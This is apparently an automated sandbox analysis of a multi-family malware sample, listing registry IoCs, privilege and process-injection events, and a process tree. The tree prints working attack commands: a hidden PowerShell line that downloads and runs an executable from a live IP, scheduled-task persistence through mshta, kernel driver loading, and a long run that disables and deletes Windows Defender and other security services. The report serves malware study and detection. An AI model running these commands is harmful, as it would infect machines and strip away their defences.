\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7866b52300.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6a8d5b79b0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 194b034ebb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2609233090.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb2df5e704.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e214b0379a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 2500 timeout.exe 7008 timeout.exe 5680 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877365975674216" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings rapes.exe -
Modifies registry key 1 TTPs 9 IoCs
pid Process 2308 reg.exe 4544 reg.exe 4216 reg.exe 220 reg.exe 2964 reg.exe 6048 reg.exe 4876 reg.exe 2432 reg.exe 3620 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 60 schtasks.exe 5860 schtasks.exe 1104 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4648 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 976 powershell.exe 976 powershell.exe 2424 TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE 2424 TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE 6112 rapes.exe 6112 rapes.exe 4648 powershell.exe 4648 powershell.exe 4648 powershell.exe 4620 powershell.exe 4620 powershell.exe 4620 powershell.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 1224 TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE 1224 TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3468 powershell.exe 3468 powershell.exe 3468 powershell.exe 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 1684 powershell.exe 1684 powershell.exe 1684 powershell.exe 4676 MSBuild.exe 4676 MSBuild.exe 4676 MSBuild.exe 4676 MSBuild.exe 4112 483d2fa8a0d53818306efeb32d3.exe 4112 483d2fa8a0d53818306efeb32d3.exe 1228 rapes.exe 1228 rapes.exe 3280 7866b52300.exe 3280 7866b52300.exe 3280 7866b52300.exe 3280 7866b52300.exe 3280 7866b52300.exe 3280 7866b52300.exe 4712 MSBuild.exe 4712 MSBuild.exe 4712 MSBuild.exe 4712 MSBuild.exe 4612 MSBuild.exe 4612 MSBuild.exe 3596 194b034ebb.exe 3596 194b034ebb.exe 2980 MSBuild.exe 2980 MSBuild.exe 2980 MSBuild.exe 2980 MSBuild.exe 4612 MSBuild.exe 4612 MSBuild.exe 4320 chrome.exe 4320 chrome.exe 468 Bell_Setup16.tmp 468 Bell_Setup16.tmp 4900 regsvr32.exe 4900 regsvr32.exe 3008 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 1208 msedge.exe 1208 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 976 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 1684 powershell.exe Token: SeShutdownPrivilege 4320 chrome.exe Token: SeCreatePagefilePrivilege 4320 chrome.exe Token: SeShutdownPrivilege 4320 chrome.exe Token: SeCreatePagefilePrivilege 4320 chrome.exe Token: SeShutdownPrivilege 4320 chrome.exe Token: SeCreatePagefilePrivilege 4320 chrome.exe Token: SeShutdownPrivilege 4320 chrome.exe Token: SeCreatePagefilePrivilege 4320 chrome.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeShutdownPrivilege 4320 chrome.exe Token: SeCreatePagefilePrivilege 4320 chrome.exe Token: SeIncreaseQuotaPrivilege 3008 powershell.exe Token: SeSecurityPrivilege 3008 powershell.exe Token: SeTakeOwnershipPrivilege 3008 powershell.exe Token: SeLoadDriverPrivilege 3008 powershell.exe Token: SeSystemProfilePrivilege 3008 powershell.exe Token: SeSystemtimePrivilege 3008 powershell.exe Token: SeProfSingleProcessPrivilege 3008 powershell.exe Token: SeIncBasePriorityPrivilege 3008 powershell.exe Token: SeCreatePagefilePrivilege 3008 powershell.exe Token: SeBackupPrivilege 3008 powershell.exe Token: SeRestorePrivilege 3008 powershell.exe Token: SeShutdownPrivilege 3008 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeSystemEnvironmentPrivilege 3008 powershell.exe Token: SeRemoteShutdownPrivilege 3008 powershell.exe Token: SeUndockPrivilege 3008 powershell.exe Token: SeManageVolumePrivilege 3008 powershell.exe Token: 33 3008 powershell.exe Token: 34 3008 powershell.exe Token: 35 3008 powershell.exe Token: 36 3008 powershell.exe Token: SeShutdownPrivilege 4320 chrome.exe Token: SeCreatePagefilePrivilege 4320 chrome.exe Token: SeDebugPrivilege 5680 PowerShell.exe Token: SeShutdownPrivilege 4320 chrome.exe Token: SeCreatePagefilePrivilege 4320 chrome.exe Token: SeIncreaseQuotaPrivilege 5680 PowerShell.exe Token: SeSecurityPrivilege 5680 PowerShell.exe Token: SeTakeOwnershipPrivilege 5680 PowerShell.exe Token: SeLoadDriverPrivilege 5680 PowerShell.exe Token: SeSystemProfilePrivilege 5680 PowerShell.exe Token: SeSystemtimePrivilege 5680 PowerShell.exe Token: SeProfSingleProcessPrivilege 5680 PowerShell.exe Token: SeIncBasePriorityPrivilege 5680 PowerShell.exe Token: SeCreatePagefilePrivilege 5680 PowerShell.exe Token: SeBackupPrivilege 5680 PowerShell.exe Token: SeRestorePrivilege 5680 PowerShell.exe Token: SeShutdownPrivilege 5680 PowerShell.exe Token: SeDebugPrivilege 5680 PowerShell.exe Token: SeSystemEnvironmentPrivilege 5680 PowerShell.exe Token: SeRemoteShutdownPrivilege 5680 PowerShell.exe Token: SeUndockPrivilege 5680 PowerShell.exe Token: SeManageVolumePrivilege 5680 PowerShell.exe Token: 33 5680 PowerShell.exe Token: 34 5680 PowerShell.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1680 e214b0379a.exe 1680 e214b0379a.exe 1680 e214b0379a.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 4320 chrome.exe 468 Bell_Setup16.tmp 1208 msedge.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1680 e214b0379a.exe 1680 e214b0379a.exe 1680 e214b0379a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1796 wrote to memory of 5044 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 1796 wrote to memory of 5044 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 1796 wrote to memory of 5044 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 1796 wrote to memory of 3196 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 1796 wrote to memory of 3196 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 1796 wrote to memory of 3196 1796 2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 5044 wrote to memory of 60 5044 cmd.exe 90 PID 5044 wrote to memory of 60 5044 cmd.exe 90 PID 5044 wrote to memory of 60 5044 cmd.exe 90 PID 3196 wrote to memory of 976 3196 mshta.exe 92 PID 3196 wrote to memory of 976 3196 mshta.exe 92 PID 3196 wrote to memory of 976 3196 mshta.exe 92 PID 976 wrote to memory of 2424 976 powershell.exe 96 PID 976 wrote to memory of 2424 976 powershell.exe 96 PID 976 wrote to memory of 2424 976 powershell.exe 96 PID 2424 wrote to memory of 6112 2424 TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE 99 PID 2424 wrote to memory of 6112 2424 TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE 99 PID 2424 wrote to memory of 6112 2424 TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE 99 PID 6112 wrote to memory of 4192 6112 rapes.exe 103 PID 6112 wrote to memory of 4192 6112 rapes.exe 103 PID 6112 wrote to memory of 4192 6112 rapes.exe 103 PID 4192 wrote to memory of 5976 4192 apple.exe 106 PID 4192 wrote to memory of 5976 4192 apple.exe 106 PID 4192 wrote to memory of 5976 4192 apple.exe 106 PID 5976 wrote to memory of 1620 5976 22.exe 108 PID 5976 wrote to memory of 1620 5976 22.exe 108 PID 1620 wrote to memory of 1884 1620 cmd.exe 110 PID 1620 wrote to memory of 1884 1620 cmd.exe 110 PID 1620 wrote to memory of 1884 1620 cmd.exe 110 PID 1884 wrote to memory of 2760 1884 22.exe 111 PID 1884 wrote to memory of 2760 1884 22.exe 111 PID 2760 wrote to memory of 5804 2760 cmd.exe 113 PID 2760 wrote to memory of 5804 2760 cmd.exe 113 PID 2760 wrote to memory of 4524 2760 cmd.exe 114 PID 2760 wrote to memory of 4524 2760 cmd.exe 114 PID 2760 wrote to memory of 5680 2760 cmd.exe 115 PID 2760 wrote to memory of 5680 2760 cmd.exe 115 PID 2760 wrote to memory of 2328 2760 cmd.exe 116 PID 2760 wrote to memory of 2328 2760 cmd.exe 116 PID 2760 wrote to memory of 4092 2760 cmd.exe 117 PID 2760 wrote to memory of 4092 2760 cmd.exe 117 PID 2760 wrote to memory of 2960 2760 cmd.exe 118 PID 2760 wrote to memory of 2960 2760 cmd.exe 118 PID 2760 wrote to memory of 516 2760 cmd.exe 119 PID 2760 wrote to memory of 516 2760 cmd.exe 119 PID 2760 wrote to memory of 2700 2760 cmd.exe 120 PID 2760 wrote to memory of 2700 2760 cmd.exe 120 PID 2760 wrote to memory of 6088 2760 cmd.exe 121 PID 2760 wrote to memory of 6088 2760 cmd.exe 121 PID 2760 wrote to memory of 2488 2760 cmd.exe 122 PID 2760 wrote to memory of 2488 2760 cmd.exe 122 PID 2760 wrote to memory of 5796 2760 cmd.exe 123 PID 2760 wrote to memory of 5796 2760 cmd.exe 123 PID 2760 wrote to memory of 1980 2760 cmd.exe 124 PID 2760 wrote to memory of 1980 2760 cmd.exe 124 PID 2760 wrote to memory of 3308 2760 cmd.exe 125 PID 2760 wrote to memory of 3308 2760 cmd.exe 125 PID 2760 wrote to memory of 1840 2760 cmd.exe 126 PID 2760 wrote to memory of 1840 2760 cmd.exe 126 PID 2760 wrote to memory of 5384 2760 cmd.exe 127 PID 2760 wrote to memory of 5384 2760 cmd.exe 127 PID 2760 wrote to memory of 1916 2760 cmd.exe 128 PID 2760 wrote to memory of 1916 2760 cmd.exe 128 PID 2760 wrote to memory of 6120 2760 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn cm7nDmatajg /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hpy6ewu7H.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn cm7nDmatajg /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hpy6ewu7H.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:60
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Hpy6ewu7H.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Local\TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE"C:\Users\Admin\AppData\Local\TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6112 -
C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5976 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B304.tmp\B305.tmp\B306.bat C:\Users\Admin\AppData\Local\Temp\22.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B40E.tmp\B40F.tmp\B410.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:5804
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4524
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:5680
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4092
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2960
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:516
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:6088
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2488
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:5796
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:3308
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:1840
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5384
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:1916
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:6120
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:5376
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:6116
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:3908
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:3892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:5316
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:4200
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:5596
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:3820
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:4912
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:5920
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4848
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:5168
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:5160
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:3936
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:412
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:3136
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3112
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:5200
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:2088
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:4416
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:2996
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:1576
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2716
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:3864
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:60
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:3896
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:1404
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:5888
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:1652
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:3684
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:464
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:5740
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:3280
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:1952
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:5908
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4436
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:3472
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:5780 -
